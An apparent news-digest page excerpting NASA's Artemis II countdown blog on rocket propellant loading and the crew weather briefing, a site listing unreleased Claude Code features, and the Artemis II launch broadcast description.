With NASA teams now maintaining the liquid oxygen levels in the interim cryogenic propulsion stage, all cryogenic stages of the SLS (Space Launch System) rocket have transitioned to replenish mode during the Artemis II launch countdown. This includes the core stage and SLS upper stage, ensuring both liquid hydrogen and liquid oxygen tanks remain at flight-ready levels.

Replenish mode is es­sen­tial for main­tain­ing sta­ble pro­pel­lant quan­ti­ties and pres­sure as su­per-cold fu­els nat­u­rally boil off over time. Continuous ad­just­ments keep the rocket fully fu­eled and ready for ig­ni­tion, sup­port­ing the RS-25 en­gines on the core stage and the RL10 en­gine on the SLS up­per stage for their es­sen­tial roles in launch and translu­nar in­jec­tion.

These mile­stones co­in­cide with the Artemis II count­down en­ter­ing a planned 1-hour and 10-minute built-in hold. This sched­uled pause al­lows teams to com­plete cru­cial sys­tem checks, ver­ify launch readi­ness, and ad­dress any last-minute ad­just­ments be­fore pro­ceed­ing to­ward crew ingress and fi­nal fu­el­ing op­er­a­tions.

During this hold, en­gi­neers re­view data from cryo­genic load­ing, propul­sion sys­tems, and com­mu­ni­ca­tions to en­sure all pa­ra­me­ters meet strict safety and per­for­mance cri­te­ria. The hold also pro­vides flex­i­bil­ity for re­solv­ing mi­nor is­sues with­out im­pact­ing the over­all launch time­line.

Once the hold concludes, the countdown will resume with preparations for astronaut arrival at Launch Pad 39B at NASA's Kennedy Space Center in Florida.

NASA's Artemis II astronauts received a final weather briefing inside the Astronaut Crew Quarters of the Neil A. Armstrong Operations and Checkout Building at the agency's Kennedy Space Center in Florida, as part of prelaunch preparations.

This weather update provides astronauts and mission teams with the latest conditions at NASA Kennedy's Launch Pad 39B, the surrounding recovery zones, and potential abort sites along Artemis II's flight path. Accurate weather forecasting is essential for protecting crew and hardware, as even minor changes can impact countdown decisions and flight dynamics.

NASA as­tro­nauts Reid Wiseman, com­man­der; Vic­tor Glover, pi­lot; and Christina Koch, mis­sion spe­cial­ist; along with CSA (Canadian Space Agency) as­tro­naut Je­remy Hansen, mis­sion spe­cial­ist, were briefed on wind speeds, pre­cip­i­ta­tion, light­ning risk, and sea states for splash­down con­tin­gen­cies, en­sur­ing all safety cri­te­ria are met be­fore pro­ceed­ing with launch op­er­a­tions.

Weather officials with NASA and the U.S. Space Force's Space Launch Delta 45 are tracking 80% favorable conditions during the launch window, with primary concerns being the cumulus cloud rule, flight through precipitation rule, and ground winds.

With the weather brief­ing com­plete, the crew and ground teams re­main aligned and ready to con­tinue to­ward liftoff, keep­ing Artemis II on track for its his­toric mis­sion to send as­tro­nauts around the Moon.

NASA teams also have begun the liquid oxygen (LOX) topping process for the interim cryogenic propulsion stage, or SLS (Space Launch System) rocket upper stage, during the Artemis II launch countdown. This step follows the fast fill phase and ensures the liquid oxygen tank reaches full capacity with super-cold oxidizer.

Live coverage of Artemis II tanking operations continues on NASA's YouTube channel. NASA's full launch coverage begins at 1 p.m. EDT on NASA+, Amazon Prime, and YouTube. You can continue to follow the Artemis blog from launch to splashdown for mission updates.

Liquid oxy­gen (LOX) fast fill is now com­plete for the SLS (Space Launch System) up­per stage, mark­ing an­other ma­jor mile­stone in tank­ing op­er­a­tions. Teams have con­firmed the up­per stage is in good shape and are pro­ceed­ing with the LOX vent and re­lief test. This step helps ver­ify proper pres­sure reg­u­la­tion and en­sures the sys­tem is ready to tran­si­tion into top­ping and, later, re­plen­ish op­er­a­tions.

NASA teams are now main­tain­ing the liq­uid oxy­gen lev­els in the SLS (Space Launch System) rocket core stage through re­plen­ish mode. This phase fol­lows the com­ple­tion of liq­uid oxy­gen fast fill and top­ping, en­sur­ing the ox­i­dizer re­mains at flight-ready lev­els through­out the fi­nal count­down.

NASA teams are in fast fill of liq­uid oxy­gen (LOX) into the in­terim cryo­genic propul­sion stage as part of the Artemis II launch count­down. This phase rapidly loads the ox­i­dizer af­ter chill­down is com­plete, bring­ing the SLS (Space Launch System) rocket up­per stage closer to full readi­ness for its role in send­ing the Orion space­craft into a high Earth or­bit ahead of a prox­im­ity op­er­a­tions demon­stra­tion test and Orion’s translu­nar in­jec­tion burn.

NASA teams have tran­si­tioned the in­terim cryo­genic propul­sion stage liq­uid hy­dro­gen tank to re­plen­ish mode dur­ing the Artemis II countdown. This phase fol­lows the suc­cess­ful top­ping process and en­sures the tank re­mains at flight-ready lev­els all the way to launch.

NASA teams have be­gun the top­ping phase for the in­terim cryo­genic propul­sion stage liq­uid hy­dro­gen (LH2) tank. This crit­i­cal step oc­curs af­ter suc­cess­ful chill­down and vent-and-re­lief checks, en­sur­ing the tank reaches full ca­pac­ity with su­per-cold liq­uid hy­dro­gen.

Replenish is the fi­nal step in the fu­el­ing process, de­signed to main­tain the cor­rect LH2 lev­els as the su­per-cold pro­pel­lant nat­u­rally boils off over time. This con­tin­u­ous, low-rate flow keeps the tanks topped off and ther­mally sta­ble, en­sur­ing the rocket re­mains fully fu­eled and ready for liftoff.

From chill­down to re­plen­ish, every phase of fu­el­ing is care­fully man­aged to pro­tect hard­ware and guar­an­tee mis­sion suc­cess. With re­plen­ish un­der­way, Artemis II is in its fi­nal stretch to­ward launch and hu­man­i­ty’s next gi­ant leap.

Topping is the process of adding small amounts of LH2 to the tanks af­ter fast fill is com­plete, en­sur­ing they re­main at full ca­pac­ity as the su­per-cold pro­pel­lant nat­u­rally boils off. This step is crit­i­cal for main­tain­ing the pre­cise lev­els needed for launch while keep­ing the sys­tem ther­mally sta­ble.

The Artemis II launch team tran­si­tioned to the fast fill of liq­uid hy­dro­gen (LH2) for the in­terim cryo­genic propul­sion stage, or SLS (Space Launch System) rocket upper stage.

After completing the chill­down phase, this step rapidly loads su­per-cold LH2 into the SLS up­per stage tanks, en­sur­ing the up­per stage is fu­eled and ready to per­form its fun­da­men­tal role of rais­ing the Orion space­craft into a high Earth or­bit ahead of a prox­im­ity op­er­a­tions demon­stra­tion test and Orion’s translu­nar in­jec­tion burn.

Fast fill ac­cel­er­ates the fu­el­ing process while main­tain­ing safety, mark­ing an­other ma­jor mile­stone in the count­down as Artemis II moves closer to liftoff.

The Artemis II launch team has be­gun the liq­uid hy­dro­gen chill­down for the in­terim cryo­genic propul­sion stage, or SLS (Space Launch System) rocket upper stage.

This process grad­u­ally cools the in­terim cryo­genic propul­sion stage fuel lines and com­po­nents to cryo­genic tem­per­a­tures us­ing su­per-cold liq­uid hy­dro­gen. The chill­down step is es­sen­tial to pre­vent ther­mal shock and en­sure the stage is prop­erly con­di­tioned for full pro­pel­lant load­ing. By sta­bi­liz­ing the sys­tem at these ex­treme tem­per­a­tures, en­gi­neers guar­an­tee safe and ef­fi­cient fu­el­ing for the up­per stage that will help po­si­tion Orion into high Earth or­bit for its jour­ney to­ward the Moon.

NASA astronauts Reid Wiseman, Victor Glover, and Christina Koch, along with CSA (Canadian Space Agency) astronaut Jeremy Hansen, have officially begun their launch day with a scheduled wake-up call at 9:25 a.m., marking the start of their final preparations for the historic Artemis II mission around the Moon.

The Artemis II launch team tran­si­tioned to the fast fill of liq­uid hy­dro­gen (LH2) into the SLS (Space Launch System) rocket core stage.

...

Read the original on www.nasa.gov »

9 1,050 shares, 41 trendiness

Claude Code Unpacked

Stuff that’s in the code but not shipped yet. Feature-flagged, env-gated, or just com­mented out.

A virtual pet that lives in your terminal. Species and rarity are derived from your account ID. Persistent mode with memory consolidation between sessions and autonomous background actions.

Long planning sessions on Opus-class models, up to 30-minute execution windows.

Control Claude Code from your phone or a browser. Full remote session with permission approvals.

Run sessions in the background with --bg.

tmux sessions talk to each other over Unix domain sockets.

Between sessions, the AI reviews what happened and organizes what it learned.
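The session-to-session communication mentioned above uses Unix domain sockets, where processes rendezvous at a filesystem path rather than a TCP port. A minimal generic sketch of that mechanism (the socket path and echo protocol here are invented for illustration, not Claude Code's actual wire format):

```python
import os
import socket
import threading

# Hypothetical rendezvous path for this sketch only.
PATH = "/tmp/ipc-demo.sock"
if os.path.exists(PATH):
    os.remove(PATH)

# "Session A" listens on a filesystem path instead of a TCP port.
server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server.bind(PATH)
server.listen(1)

def echo_once():
    # Accept one peer, prefix its message, and reply.
    conn, _ = server.accept()
    with conn:
        conn.sendall(b"ack: " + conn.recv(1024))

t = threading.Thread(target=echo_once)
t.start()

# "Session B" connects to the same path and exchanges a message.
client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
client.connect(PATH)
client.sendall(b"hello")
reply = client.recv(1024).decode()
client.close()
t.join()
server.close()
os.remove(PATH)
print(reply)  # ack: hello
```

Because the endpoint is a file, access can be controlled with ordinary filesystem permissions, which is one common reason tools choose Unix sockets for local IPC.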

...

Read the original on ccunpacked.dev »

10 1,027 shares, 42 trendiness

NASA’s Artemis II Crew Launches to the Moon (Official Broadcast)

Artemis II is NASA's first crewed mission under the Artemis program and will launch from the agency's Kennedy Space Center in Florida. It will send NASA astronauts Reid Wiseman, Victor Glover, Christina Koch, and CSA (Canadian Space Agency) astronaut Jeremy Hansen on an approximately 10-day journey around the Moon. Among its objectives, the agency will test the Orion spacecraft's life support systems for the first time with people and lay the groundwork for future crewed Artemis missions.

...

Read the original on plus.nasa.gov »
